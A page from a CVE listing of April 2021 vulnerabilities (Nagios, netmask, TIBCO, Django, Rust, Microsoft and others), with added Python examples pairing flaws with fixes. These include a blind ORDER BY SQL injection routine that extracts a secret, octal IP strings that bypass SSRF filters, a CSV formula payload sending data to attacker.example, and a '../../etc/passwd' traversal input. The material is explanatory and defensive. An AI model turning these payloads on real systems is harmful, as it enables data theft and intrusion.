CVEdetails.com the ultimate security vulnerability data source

Security Vulnerabilities Published In April 2021

# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
351 CVE-2021-28925 89 Sql 2021-04-08 2021-04-13
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in Nagios Network Analyzer before 2.4.3 via the o[col] parameter to api/checks/read/.
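A parameter such as o[col] names a sort column, and column names cannot be passed as bound parameters, so the usual way such a parameter becomes injectable is by being spliced into an ORDER BY clause. The following is an added example, not Nagios code: it assumes the parameter reaches an ORDER BY (the entry above does not say where it is used), builds a constructed SQLite schema in memory, shows how a single ORDER BY injection point yields a boolean oracle that leaks a secret one character per request, and puts the allow-list fix beside it.

```python
"""ORDER BY injection via a user-controlled sort column, and the allow-list fix.

Added example for the Nagios Network Analyzer entry; constructed schema and
data, not Nagios's. Assumes the sort parameter is spliced into ORDER BY."""
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a table the API sorts, plus a secret the
    attacker wants and the DB user can read."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE checks (id INTEGER PRIMARY KEY, name TEXT, severity INTEGER);
        INSERT INTO checks VALUES (1, 'disk', 2), (2, 'cpu', 1), (3, 'mem', 3);
        CREATE TABLE api_tokens (secret TEXT);
        INSERT INTO api_tokens VALUES ('s3cr3t');
    """)
    return con


def read_checks_vulnerable(con: sqlite3.Connection, col: str) -> list:
    """Vulnerable pattern: the sort column arrives as text and is spliced
    straight into the SQL. Parameter binding cannot be used for identifiers,
    which is why this spot is so often left unprotected."""
    sql = f"SELECT id, name FROM checks ORDER BY {col}"
    return con.execute(sql).fetchall()


# Allow-list: the only spellings a client may send, mapped to real columns.
ALLOWED_COLS = {"id": "id", "name": "name", "severity": "severity"}
ALLOWED_DIRS = {"asc": "ASC", "desc": "DESC"}


def read_checks_hardened(con: sqlite3.Connection, col: str, direction: str = "asc") -> list:
    """Hardened: look the client value up in a fixed mapping and interpolate
    only the server-side string. Anything not in the map is refused."""
    if col not in ALLOWED_COLS or direction.lower() not in ALLOWED_DIRS:
        raise ValueError(f"unsupported sort: {col!r} {direction!r}")
    sql = f"SELECT id, name FROM checks ORDER BY {ALLOWED_COLS[col]} {ALLOWED_DIRS[direction.lower()]}"
    return con.execute(sql).fetchall()


def order_by_oracle(con: sqlite3.Connection, condition: str) -> bool:
    """One blind request: when `condition` is true the rows come back sorted
    by id ascending, otherwise descending. The id of the first row therefore
    answers an arbitrary yes/no question about the database."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    rows = read_checks_vulnerable(con, payload)
    return rows[0][0] == 1


def extract_secret(con: sqlite3.Connection, length: int = 6,
                   alphabet: str = string.ascii_lowercase + string.digits) -> str:
    """Recover api_tokens.secret one position at a time through the oracle."""
    found = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            cond = f"(SELECT substr(secret, {pos}, 1) FROM api_tokens) = '{ch}'"
            if order_by_oracle(con, cond):
                found += ch
                break
        else:
            break  # no character matched: end of string or outside alphabet
    return found


def hardened_rejects(con: sqlite3.Connection, col: str) -> bool:
    """True if the allow-listed reader refuses the given sort column."""
    try:
        read_checks_hardened(con, col)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", extract_secret(db))
    print("hardened rejects payload:", hardened_rejects(db, "(CASE WHEN 1=1 THEN id ELSE -id END)"))
```

The oracle needs no error messages and no data in the response body beyond the row order, which is why ORDER BY injection survives in APIs that otherwise return nothing sensitive. Escaping the column name does not help; the fix is the mapping, and the same applies to table names, directions and any other identifier a client may choose.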
352 CVE-2021-28924 79 XSS 2021-04-08 2021-04-12
4.3
None Remote Medium Not required None Partial None
Self Authenticated XSS in Nagios Network Analyzer before 2.4.2 via the nagiosna/groups/queries page.
353 CVE-2021-28918 20 Bypass 2021-04-01 2021-12-30
6.4
None Remote Low Not required Partial Partial None
Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
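The issue described above is a parser disagreement: an IP filter that reads each dotted part as decimal classifies "0177.0.0.1" as the public address 177.0.0.1, while the socket layer, following the classic inet_aton() rules, connects to 127.0.0.1. The following is an added example, not code from the netmask package: it implements both parsers side by side, runs a simulated private-range filter through each, and shows the hardened decision (canonical spelling only, then filter on the value the socket layer will actually use). The parser names, the regexes and the sample addresses are this example's own.

```python
"""Octal/hex IPv4 ambiguity of the kind behind CVE-2021-28918.

Added example, not netmask code: a filter that reads every dotted part as
decimal disagrees with the BSD inet_aton() rules that libc socket code
applies, so "0177.0.0.1" looks like public 177.0.0.1 to the filter while
the connection actually goes to loopback 127.0.0.1."""
import ipaddress
import re

# One inet_aton() part: hex (0x..), octal (leading 0), or decimal.
_PART = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")
# Canonical dotted-decimal: exactly four octets, no leading zeros, no hex.
_CANONICAL = re.compile(
    r"(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
)


def naive_parse(addr: str) -> ipaddress.IPv4Address:
    """Lenient parser: four dotted parts, each read as decimal.
    int("0177") == 177, so the octal marker is silently lost."""
    parts = addr.split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted quad: {addr!r}")
    octets = [int(p, 10) for p in parts]
    if any(o > 255 for o in octets):
        raise ValueError(f"octet out of range: {addr!r}")
    return ipaddress.IPv4Address(".".join(map(str, octets)))


def inet_aton_parse(addr: str) -> ipaddress.IPv4Address:
    """Classic inet_aton() rules: 1 to 4 parts, 0x-prefixed parts are hex,
    0-prefixed parts are octal, and the last part fills every remaining
    byte ("127.1" and "2130706433" both mean 127.0.0.1)."""
    parts = addr.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"bad part count: {addr!r}")
    values = []
    for p in parts:
        if not _PART.fullmatch(p):
            raise ValueError(f"bad part {p!r} in {addr!r}")
        if p[:2].lower() == "0x":
            values.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            values.append(int(p, 8))
        else:
            values.append(int(p, 10))
    *head, tail = values
    tail_bytes = 4 - len(head)
    if any(v > 255 for v in head) or tail >= 1 << (8 * tail_bytes):
        raise ValueError(f"part out of range: {addr!r}")
    n = 0
    for v in head:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << (8 * tail_bytes)) | tail)


def is_canonical(addr: str) -> bool:
    """Strict check: accept only canonical dotted-decimal. Refusing every
    other spelling removes the ambiguity instead of trying to model it."""
    return _CANONICAL.fullmatch(addr) is not None


def blocked_by_filter(addr: str, parser) -> bool:
    """Simulated SSRF filter: deny loopback, RFC 1918 and link-local targets
    as seen through the given parser."""
    ip = parser(addr)
    return ip.is_loopback or ip.is_private or ip.is_link_local


def safe_target(addr: str) -> bool:
    """Hardened decision: canonical spelling only, then filter on the value
    the socket layer will actually use."""
    return is_canonical(addr) and not blocked_by_filter(addr, inet_aton_parse)


if __name__ == "__main__":
    for a in ("0177.0.0.1", "0x7f.1", "2130706433", "127.0.0.1"):
        print(a, "->", inet_aton_parse(a), "allowed:", safe_target(a))
```

The filter and the connector must agree on what an address string means; the safest way to guarantee that is to refuse any spelling other than canonical dotted-decimal before the filter runs. Hostnames need the same treatment: resolve first, then filter the resolved addresses, and connect only to the address that was filtered.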
354 CVE-2021-28899 2021-04-29 2021-05-11
5.0
None Remote Low Not required None None Partial
Vulnerability in the AC3AudioFileServerMediaSubsession, ADTSAudioFileServerMediaSubsession, and AMRAudioFileServerMediaSubsession OnDemandServerMediaSubsession subclasses in Live Networks LIVE555 Streaming Media before 2021.3.16.
355 CVE-2021-28879 190 Overflow 2021-04-11 2021-04-27
7.5
None Remote Low Not required Partial Partial Partial
In the standard library in Rust before 1.52.0, the Zip implementation can report an incorrect size due to an integer overflow. This bug can lead to a buffer overflow when a consumed Zip iterator is used again.
356 CVE-2021-28878 119 Overflow 2021-04-11 2021-04-27
4.3
None Remote Medium Not required None None Partial
In the standard library in Rust before 1.52.0, the Zip implementation calls __iterator_get_unchecked() more than once for the same index (under certain conditions) when next_back() and next() are used together. This bug could lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
357 CVE-2021-28877 119 Overflow 2021-04-11 2021-04-22
5.0
None Remote Low Not required None None Partial
In the standard library in Rust before 1.51.0, the Zip implementation calls __iterator_get_unchecked() for the same index more than once when nested. This bug can lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
358 CVE-2021-28876 119 Overflow 2021-04-11 2021-06-24
4.3
None Remote Medium Not required None Partial None
In the standard library in Rust before 1.52.0, the Zip implementation has a panic safety issue. It calls __iterator_get_unchecked() more than once for the same index when the underlying iterator panics (in certain conditions). This bug could lead to a memory safety violation due to an unmet safety requirement for the TrustedRandomAccess trait.
359 CVE-2021-28875 252 Overflow 2021-04-11 2021-04-22
5.0
None Remote Low Not required None None Partial
In the standard library in Rust before 1.50.0, read_to_end() does not validate the return value from Read in an unsafe context. This bug could lead to a buffer overflow.
360 CVE-2021-28874 120 Overflow 2021-04-06 2021-04-09
6.8
None Remote Medium Not required Partial Partial Partial
SerenityOS before commit c9f25bca048443e317f1994ba9b106f2386688c3 (which fixes the issue) contains a buffer overflow vulnerability in LibTextCode that is triggered by opening a crafted file.
361 CVE-2021-28856 369 2021-04-14 2021-04-21
4.3
None Remote Medium Not required None None Partial
In Deark before v1.5.8, a specially crafted input file can cause a division by zero in (src/fmtutil.c) because of the value of pixelsize.
362 CVE-2021-28855 476 2021-04-14 2021-04-19
4.3
None Remote Medium Not required None None Partial
In Deark before 1.5.8, a specially crafted input file can cause a NULL pointer dereference in the dbuf_write function (src/deark-dbuf.c).
363 CVE-2021-28832 Exec Code 2021-04-05 2021-04-08
6.8
None Remote Medium Not required Partial Partial Partial
VSCodeVim before 1.19.0 allows attackers to execute arbitrary code via a crafted workspace configuration.
364 CVE-2021-28829 74 2021-04-20 2021-04-23
6.0
None Remote Medium ??? Partial Partial Partial
The Administration GUI component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition for z/Linux, and TIBCO Administrator - Enterprise Edition for z/Linux contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a persistent CSV injection attack from the affected system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.10.2 and below, and TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.11.0 and 5.11.1.
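CSV injection as described above is stored, not reflected: a low-privileged user writes a value that begins with a spreadsheet formula trigger, an administrator later exports the data and opens it, and the spreadsheet evaluates the cell. The following is an added example, not TIBCO code, with a constructed export: it shows the unprotected writer beside a version that neutralises formula-leading cells at export time. FORMULA_TRIGGERS, SAMPLE_ROWS and the hostname in the payload are this example's own.

```python
"""CSV (formula) injection defence. Added example for the TIBCO Administrator
CSV injection entry; constructed data, not TIBCO code."""
import csv
import io

# Leading characters that spreadsheet applications treat as the start of a
# formula. Tab and carriage return are included because some importers trim
# them and then evaluate what remains.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample export: the third row carries an attacker-supplied note
# that would send the adjacent cell to an external host when clicked.
SAMPLE_ROWS = [
    ("host", "owner", "note"),
    ("web01", "alice", "nightly backup ok"),
    ("db01", "mallory", '=HYPERLINK("http://attacker.example/?"&A3,"open runbook")'),
    ("app02", "bob", "-3 disks pending"),
]


def neutralize_cell(value):
    """Make a single cell inert for spreadsheet import.

    Strings that begin with a trigger character get a leading apostrophe,
    which spreadsheets interpret as "display as text". Non-string values
    (numbers, None) pass through so numeric columns stay numeric."""
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_csv(rows, hardened: bool = True) -> str:
    """Serialise rows to CSV. With hardened=False every cell is written as
    stored, which is the exploitable pattern the advisory describes."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row] if hardened else list(row))
    return buf.getvalue()


if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS, hardened=False))
    print(export_csv(SAMPLE_ROWS))
```

Quoting alone (csv.QUOTE_ALL) does not help: the spreadsheet strips the quotes and still evaluates the cell. The apostrophe prefix is a presentation fix and it also touches legitimate values such as "-3 disks pending", so the alternative, where it is acceptable, is to reject trigger-leading input when it is stored rather than rewrite it on export.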
365 CVE-2021-28828 89 Sql 2021-04-20 2021-04-23
6.5
None Remote Low ??? Partial Partial Partial
The Administration GUI component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition for z/Linux, and TIBCO Administrator - Enterprise Edition for z/Linux contains an easily exploitable vulnerability that allows a low privileged attacker with network access to execute a SQL injection attack on the affected system. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.10.2 and below, and TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.11.0 and 5.11.1.
366 CVE-2021-28827 79 XSS 2021-04-20 2021-04-27
6.8
None Remote Medium Not required Partial Partial Partial
The Administration GUI component of TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric, TIBCO Administrator - Enterprise Edition for z/Linux, TIBCO Administrator - Enterprise Edition for z/Linux, TIBCO Runtime Agent, TIBCO Runtime Agent, TIBCO Runtime Agent for z/Linux, and TIBCO Runtime Agent for z/Linux contains an easily exploitable vulnerability that allows an unauthenticated attacker to social engineer a legitimate user with network access to execute a Stored XSS attack targeting the affected system. A successful attack using this vulnerability requires human interaction from a person other than the attacker. Affected releases are TIBCO Software Inc.'s TIBCO Administrator - Enterprise Edition: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition Distribution for TIBCO Silver Fabric: versions 5.11.0 and 5.11.1, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.10.2 and below, TIBCO Administrator - Enterprise Edition for z/Linux: versions 5.11.0 and 5.11.1, TIBCO Runtime Agent: versions 5.10.2 and below, TIBCO Runtime Agent: versions 5.11.0 and 5.11.1, TIBCO Runtime Agent for z/Linux: versions 5.10.2 and below, and TIBCO Runtime Agent for z/Linux: versions 5.11.0 and 5.11.1.
367 CVE-2021-28826 863 2021-04-14 2021-04-22
7.2
None Local Low Not required Complete Complete Complete
The Windows Installation component of TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Community Edition and TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Enterprise Edition contains a vulnerability that theoretically allows a low privileged attacker with local access on some versions of the Windows operating system to insert malicious software. The affected component can be abused to execute the malicious software inserted by the attacker with the elevated privileges of the component. This vulnerability results from a lack of access restrictions on certain files and/or folders in the installation. Affected releases are TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Community Edition: versions 1.3.0 and below and TIBCO Messaging - Eclipse Mosquitto Distribution - Bridge - Enterprise Edition: versions 1.3.0 and below.
368 CVE-2021-28825 863 2021-04-14 2021-04-22
7.2
None Local Low Not required Complete Complete Complete
The Windows Installation component of TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Community Edition and TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Enterprise Edition contains a vulnerability that theoretically allows a low privileged attacker with local access on some versions of the Windows operating system to insert malicious software. The affected component can be abused to execute the malicious software inserted by the attacker with the elevated privileges of the component. This vulnerability results from a lack of access restrictions on certain files and/or folders in the installation. Affected releases are TIBCO Software Inc.'s TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Community Edition: versions 1.3.0 and below and TIBCO Messaging - Eclipse Mosquitto Distribution - Core - Enterprise Edition: versions 1.3.0 and below.
369 CVE-2021-28797 787 Exec Code Overflow 2021-04-14 2021-04-21
7.5
None Remote Low Not required Partial Partial Partial
A stack-based buffer overflow vulnerability has been reported to affect QNAP NAS devices running Surveillance Station. If exploited, this vulnerability allows attackers to execute arbitrary code. QNAP have already fixed this vulnerability in the following versions: Surveillance Station 5.1.5.4.3 (and later) for ARM CPU NAS (64-bit OS) and x86 CPU NAS (64-bit OS); Surveillance Station 5.1.5.3.3 (and later) for ARM CPU NAS (32-bit OS) and x86 CPU NAS (32-bit OS).
370 CVE-2021-28793 863 Exec Code 2021-04-20 2021-04-23
7.5
None Remote Low Not required Partial Partial Partial
vscode-restructuredtext before 146.0.0 contains an incorrect access control vulnerability, where a crafted project folder could execute arbitrary binaries via crafted workspace configuration.
371 CVE-2021-28688 665 2021-04-06 2021-06-23
2.1
None Local Low Not required None None Partial
The fix for XSA-365 includes initialization of pointers such that subsequent cleanup code wouldn't use uninitialized or stale values. This initialization went too far and may under certain conditions also overwrite pointers which are in need of cleaning up. The lack of cleanup would result in leaking persistent grants. The leak in turn would prevent fully cleaning up after a respective guest has died, leaving around zombie domains. All Linux versions having the fix for XSA-365 applied are vulnerable. XSA-365 was classified to affect versions back to at least 3.11.
372 CVE-2021-28686 787 DoS Overflow 2021-04-08 2021-04-16
2.1
None Local Low Not required None None Partial
AsIO2_64.sys and AsIO2_32.sys in ASUS GPUTweak II before 2.3.0.3 allow low-privileged users to trigger a stack-based buffer overflow. This could enable low-privileged users to achieve Denial of Service via a DeviceIoControl.
373 CVE-2021-28685 269 2021-04-08 2021-04-20
7.2
None Local Low Not required Complete Complete Complete
AsIO2_64.sys and AsIO2_32.sys in ASUS GPUTweak II before 2.3.0.3 allow low-privileged users to interact directly with physical memory (by calling one of several driver routines that map physical memory into the virtual address space of the calling process) and to interact with MSR registers. This could enable low-privileged users to achieve NT AUTHORITY\SYSTEM privileges via a DeviceIoControl.
374 CVE-2021-28658 22 Dir. Trav. 2021-04-06 2021-06-04
5.0
None Remote Low Not required Partial None None
In Django 2.2 before 2.2.20, 3.0 before 3.0.14, and 3.1 before 3.1.8, MultiPartParser allowed directory traversal via uploaded files with suitably crafted file names. Built-in upload handlers were not affected by this vulnerability.
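The entry above notes that Django's built-in upload handlers were not affected; the exposure is a custom handler that takes the filename from the multipart request and joins it onto its storage directory. The following is an added example, not Django's code: it reproduces that traversal in a small function, then shows the hardened handling (reduce the client name to one safe path component, then re-check that the final path is still under the root). UPLOAD_ROOT and the function names are this example's own, and posixpath is used for all path arithmetic so the result does not depend on the host operating system.

```python
"""Upload filename handling. Added example for the Django MultiPartParser
entry; not Django code. Shows a traversal-prone custom handler beside a
hardened one."""
import ntpath
import posixpath
import re

UPLOAD_ROOT = "/srv/uploads"  # assumed storage directory for this example

# Anything outside letters, digits, underscore, dot and hyphen is replaced.
_UNSAFE_CHARS = re.compile(r"[^\w.\-]")


def unsafe_destination(root: str, client_filename: str) -> str:
    """Vulnerable pattern: trust the multipart filename as a relative path.
    "../../etc/passwd" and an absolute name both leave the root."""
    return posixpath.normpath(posixpath.join(root, client_filename))


def sanitize_filename(client_filename: str) -> str:
    """Reduce an attacker-controlled filename to one path component.

    Both separator conventions are stripped because the client decides which
    one it sends. Remaining metacharacters are replaced, leading dots are
    removed (so "..", "...." and hidden files are refused), and the result
    must be non-empty."""
    if "\x00" in client_filename:
        raise ValueError("NUL byte in filename")
    name = ntpath.basename(posixpath.basename(client_filename))
    name = _UNSAFE_CHARS.sub("_", name.strip()).lstrip(".")
    if not name:
        raise ValueError(f"refusing filename {client_filename!r}")
    return name


def safe_destination(root: str, client_filename: str) -> str:
    """Hardened: join only the sanitized component, then confirm containment.
    A real handler should resolve symlinks with os.path.realpath() on both
    sides before this comparison."""
    dest = posixpath.normpath(posixpath.join(root, sanitize_filename(client_filename)))
    if posixpath.commonpath([root, dest]) != posixpath.normpath(root):
        raise ValueError("destination escapes upload root")
    return dest


def rejects(client_filename: str) -> bool:
    """True if the hardened handler refuses the name."""
    try:
        safe_destination(UPLOAD_ROOT, client_filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    evil = "../../etc/passwd"
    print("vulnerable:", unsafe_destination(UPLOAD_ROOT, evil))
    print("hardened:  ", safe_destination(UPLOAD_ROOT, evil))
```

Sanitising the name is the primary control; the containment check is defence in depth for the day someone passes a value that bypassed sanitisation. Neither replaces an extension allow-list and a storage location outside the served document root.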
375 CVE-2021-28648 269 Exec Code 2021-04-22 2021-04-29
4.6
None Local Low Not required Partial Partial Partial
Trend Micro Antivirus for Mac 2020 v10.5 and 2021 v11 (Consumer) is vulnerable to an improper access control privilege escalation vulnerability that could allow an attacker to establish a connection that could lead to full local privilege escalation within the application. Please note that an attacker must first obtain the ability to execute low-privileged code on the target system to exploit this vulnerability.
376 CVE-2021-28647 427 2021-04-13 2021-04-14
4.4
None Local Medium Not required Partial Partial Partial
Trend Micro Password Manager version 5 (Consumer) is vulnerable to a DLL hijacking vulnerability which could allow an attacker to inject a malicious DLL file during the installation process and could execute a malicious program each time a user installs a program.
377 CVE-2021-28646 732 2021-04-13 2021-04-14
2.1
None Local Low Not required None Partial None
An insecure file permissions vulnerability in Trend Micro Apex One, Apex One as a Service and OfficeScan XG SP1 could allow a local attacker to take control of a specific log file on affected installations.
378 CVE-2021-28645 732 Exec Code 2021-04-13 2021-04-14
7.2
None Local Low Not required Complete Complete Complete
An incorrect permission assignment vulnerability in Trend Micro Apex One, Apex One as a Service and OfficeScan XG SP1 could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
379 CVE-2021-28549 120 Exec Code Overflow 2021-04-15 2021-09-08
6.8
None Remote Medium Not required Partial Partial Partial
Adobe Photoshop versions 21.2.6 (and earlier) and 22.3 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted JSX file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
380 CVE-2021-28548 120 Exec Code Overflow 2021-04-15 2021-09-08
6.8
None Remote Medium Not required Partial Partial Partial
Adobe Photoshop versions 21.2.6 (and earlier) and 22.3 (and earlier) are affected by a Buffer Overflow vulnerability when parsing a specially crafted JSX file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
381 CVE-2021-28546 353 2021-04-01 2021-09-14
4.3
None Remote Medium Not required None Partial None
Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are missing support for an integrity check. An unauthenticated attacker could leverage this vulnerability to modify content in a certified PDF without invalidating the certification. Exploitation of this issue requires user interaction in that a victim must open the tampered file.
382 CVE-2021-28545 353 2021-04-01 2021-09-08
5.8
None Remote Medium Not required Partial Partial None
Acrobat Reader DC versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are missing support for an integrity check. An unauthenticated attacker would have the ability to completely manipulate data in a certified PDF without invalidating the original certification. Exploitation of this issue requires user interaction in that a victim must open the tampered file.
383 CVE-2021-28492 2021-04-20 2021-05-04
4.0
None Remote Low ??? Partial None None
Unisys Stealth (core) 5.x before 5.0.048.0, 5.1.x before 5.1.017.0, and 6.x before 6.0.037.0 stores passwords in a recoverable format.
384 CVE-2021-28484 835 2021-04-14 2021-06-04
5.0
None Remote Low Not required None None Partial
An issue was discovered in the /api/connector endpoint handler in Yubico yubihsm-connector before 3.0.1 (in YubiHSM SDK before 2021.04). The handler did not validate the length of the request, which can lead to a state where yubihsm-connector becomes stuck in a loop waiting for the YubiHSM to send it data, preventing any further operations until the yubihsm-connector is restarted. An attacker can send 0, 1, or 2 bytes to trigger this.
385 CVE-2021-28483 Exec Code 2021-04-13 2021-04-14
7.7
None Local Network Low ??? Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28482.
386 CVE-2021-28482 Exec Code 2021-04-13 2021-04-14
9.0
None Remote Low ??? Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28483.
387 CVE-2021-28481 Exec Code 2021-04-13 2021-04-14
10.0
None Remote Low Not required Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28482, CVE-2021-28483.
388 CVE-2021-28480 Exec Code 2021-04-13 2021-04-14
10.0
None Remote Low Not required Complete Complete Complete
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28481, CVE-2021-28482, CVE-2021-28483.
389 CVE-2021-28477 Exec Code 2021-04-13 2021-04-16
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28469, CVE-2021-28473, CVE-2021-28475.
390 CVE-2021-28475 Exec Code 2021-04-13 2021-04-16
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28469, CVE-2021-28473, CVE-2021-28477.
391 CVE-2021-28473 Exec Code 2021-04-13 2021-04-16
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28469, CVE-2021-28475, CVE-2021-28477.
392 CVE-2021-28472 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Maven for Java Extension Remote Code Execution Vulnerability
393 CVE-2021-28471 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability
394 CVE-2021-28470 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
395 CVE-2021-28469 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Visual Studio Code Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28457, CVE-2021-28473, CVE-2021-28475, CVE-2021-28477.
396 CVE-2021-28468 843 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28466.
397 CVE-2021-28466 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
Raw Image Extension Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28468.
398 CVE-2021-28464 Exec Code 2021-04-13 2021-04-20
6.8
None Remote Medium Not required Partial Partial Partial
VP9 Video Extensions Remote Code Execution Vulnerability
399 CVE-2021-28460 Exec Code 2021-04-13 2021-04-20
4.6
None Local Low Not required Partial Partial Partial
Azure Sphere Unsigned Code Execution Vulnerability
400 CVE-2021-28459 79 XSS 2021-04-13 2021-04-20
4.3
None Remote Medium Not required None Partial None
Azure DevOps Server Spoofing Vulnerability
Total number of vulnerabilities: 1821 (page 8 of 37)